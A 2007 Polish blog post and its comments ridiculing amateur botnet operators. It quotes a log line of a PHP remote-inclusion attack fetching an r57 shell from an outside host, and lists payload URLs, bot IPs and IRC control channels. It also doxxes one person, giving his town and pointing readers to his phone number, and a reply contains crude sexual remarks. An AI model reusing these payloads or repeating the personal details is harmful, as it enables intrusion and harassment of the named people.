Polacy nie umieją hakować

Podobno biali nie umieją skakać a Polacy - hackować. Niektórzy jednak usiłują. Zaczęło się od tego, że w kwietniu niejaki "bapoz" oblukał skrypt PHPinjection typu r57 i od razu postanowił go wypróbować:

83.15.139.164 - - [06/Apr/2007:23:30:15 +0200] "GET /***=http://alienr0x.by.ru/r57.txt?? HTTP/1.1" 403 1011 "-" "libwww-perl/5.64" "-" "-"

Trwał rok szkolny, więc nie za bardzo był czas na zabawy w hakierstwo. Ale po zakończeniu roku bapoz stwierdził, że trzeba się tym zająć "na poważnie".

Założyli strony: http://bapoz.webpark.pl/center/base, http://center.cba.pl/center/base, http://sslsystem.webpark.pl/center/base i umieścili tam skrypty typu PHP injection.

W ciągu około 1,5 miesiąca następujące IPki pracują dla nich:

193.219.28.149
194.169.227.113
194.24.174.44
195.7.164.35
199.239.233.136
200.157.178.95
205.234.186.43
205.234.204.136
207.210.102.125
207.38.5.218
207.44.210.87
207.44.238.17
208.68.233.4
208.77.96.193
209.205.196.5
209.59.130.114
209.59.180.249
209.62.108.153
209.85.102.18
212.191.172.5
212.244.101.2
216.127.72.126
216.246.98.118
217.113.226.82
217.151.228.18
218.38.12.36
220.90.215.102
4.79.181.208
4.79.181.218
63.245.198.19
63.76.55.109
66.235.222.11
66.7.194.67
66.80.60.41
66.80.60.44
67.15.187.34
67.15.45.20
67.28.112.45
67.28.112.53
67.28.112.54
67.28.112.55
67.28.112.79
69.16.205.132
69.16.229.254
69.64.68.152
70.85.142.250
70.85.207.194
72.29.74.3
72.52.130.240
72.52.204.113
80.65.49.50
83.15.139.164
85.10.199.229
85.17.142.101
87.106.11.13
87.106.56.220
88.191.51.220

Uważne oko znowu dostrzeże 83.15.139.164.

Tak jakoś na początku sierpnia ich strony zostały zdjęte za naruszenie regulaminu. Zakładają jeszcze http://12049942.webpark.pl/center/base, ale ona też jest szybko zdjęta. Ale nie rezygnują! Przecież jeden z nich ma własną domenę - umieszczają tam skrypt http://nukedclx.info/php/base - 21 sierpnia startują od nowa i następujące IPki pracują dla nich:

12.49.38.130
193.137.127.140
212.191.172.5
216.32.73.186
64.118.85.27
64.157.4.34
64.157.4.45
66.180.173.59
67.28.112.185
67.28.112.192
67.28.112.204
67.28.112.205
67.28.112.206
70.85.142.250
85.128.94.226

Co ciekawego siedzi w tym pliku "base" ? Między innymi kawałek kodu odpowiedzialnego za ustanowienie połączenia z serwerem IRC irc.velocityirc.net:6668 gdzie na kanale #xbots mogą wydawać polecenia do wykonania. Siedzą tam dwaj osobnicy: bapoz i nukedclx oraz oczywiście masa botów. Napatoczyłem się tam też ja, tak koło 1 w nocy 22 sierpnia. Zostałem wykopany oczywście już po minucie...

Było to bardzo niegrzeczne ze strony bapoza, prawdopodobnie na kanale przebywało za dużo "osób" na raz i stąd takie a nie inne zachowanie - dlatego też postarałem się aby liczba botów zmniejszyła się znacznie...

Ktoś chce telefon do nukedclx? Jest w danych domeny nukedclx.info, mieszka w Solcu Kujawskim lub okolicach. Jakby ktoś się chciał dowiedzieć jak się włamać na GG to możecie śmiało do niego dzwonić ;)

A wracając do tytułu strony - czemu uważam, że Polacy nie umieją hackować? Bo jakby umieli, toby nie zostawiali takich oczywistych śladów. A bapozowi i nukedclx kroi się wizyta Pana Dzielnicowego - wszystko zależy od poszkodowanych.

Przypadek nr. 2

używa nicka "chez michal.mic@sejm.gov, michal.mic@241net22.net.zeork.com.pl", używa IP: 194.117.241.22 i wydaje mu się, że jak od czasu do czasu użyje Proxy to będzie anonimowy. Rozmawiałem z nim na IRCu irc.esylum.net:6667, kanał #ihuj - wybrał strategię "palenia głupa" - to nie on, to nie jego skrypty (cytat ze środka: "Skaner napisany przez morgana, zmodyfikowany przez chez"), to nie on utworzył konto na republice, to nie on się włamuje. Podobno zaledwie 3 godziny wcześniej przejął po kimś kanał.

Żałosne.

A dzisiaj 2007-08-27 "chez" sobie siedzi na kanale irc.indoirc.net:6667/Vuln-Scan - na kanale gdzie można się wymieniać informacjami o backdoorach. I nadal mnie nie zauwazył.

Dzisiaj 2007-09-06 chez obsługuje boty z 206.225.84.33:8434 #bind

Dzisiaj 2007-09-15 chez obsługuje boty z bots.crewchat.org:6667 #ihuj

chez skończysz w końcu z tym, o czym nie masz zielonego pojęcia czy mam dokładać kolejne przypadki Twojej niekompetencji?

Data utworzenia : 2007-09-15

Skomentuj ten tekst

Komentarze:

IPs

2007-11-08 11:52:29

Lame

Kolejny IP tego gościa z którego operuje to pewnie 83.18.48.82 :) Nawet nie umie się zdelistować z http://dsbl.org/ :D

Hubert

2007-10-27 11:01:16

chez

Heh, dziś poznałem tą osobę, blokowała forum mi tylko po to by ktoś mu dał zaproszenie. Heh dziwne ma metody.

VRANGEL

2007-10-12 13:17:07

Ot takie początki...

Chłopcy od czegoś muszą zacząć. Ponoć uczymy się na błędach. Pamiętam, jak przed laty fascynował mnie IRC, tunele, take over itp... Były Windowsy, Linux, troszkę z rodziny BSD i też po trosze kombinowałem, teraz chodzę w białym kapeluszu, przynajmniej tak mnie się zdaje... i nadal się uczę... ;) Masz fajną stronkę, Lemat, Pozdrawiam, V.

Odpowiedź Lemata:

Chłopcy zaczną od tego, że zwiedzą celę. A w środku celi będzie wielce samotny Pan Zdzisio z wielkim i żylastym ptakiem. Zauważ, że oni zaczeli odpierdalać masówkę - to już nie jest nauka, to już stało się przedsięwzięcie komercyjne. Takie grupy jak powyższe sprzedają potem taki botnet prawdziwym spamerom, takim, którzy sprzedają Viagrę Panu Zdzisiowi. I kółko się zamyka - bo Pan Zdzisio marzy o powiększaniu otworów nastoletnim chłopcom...

mikikam

2007-10-06 13:03:38

No proszę...

To dzwonimy do tego goscia? Jego numer to: XXXXXXX zgodnie z whois :) Ciekawe czy powie nam jak sie wlamac na gg :P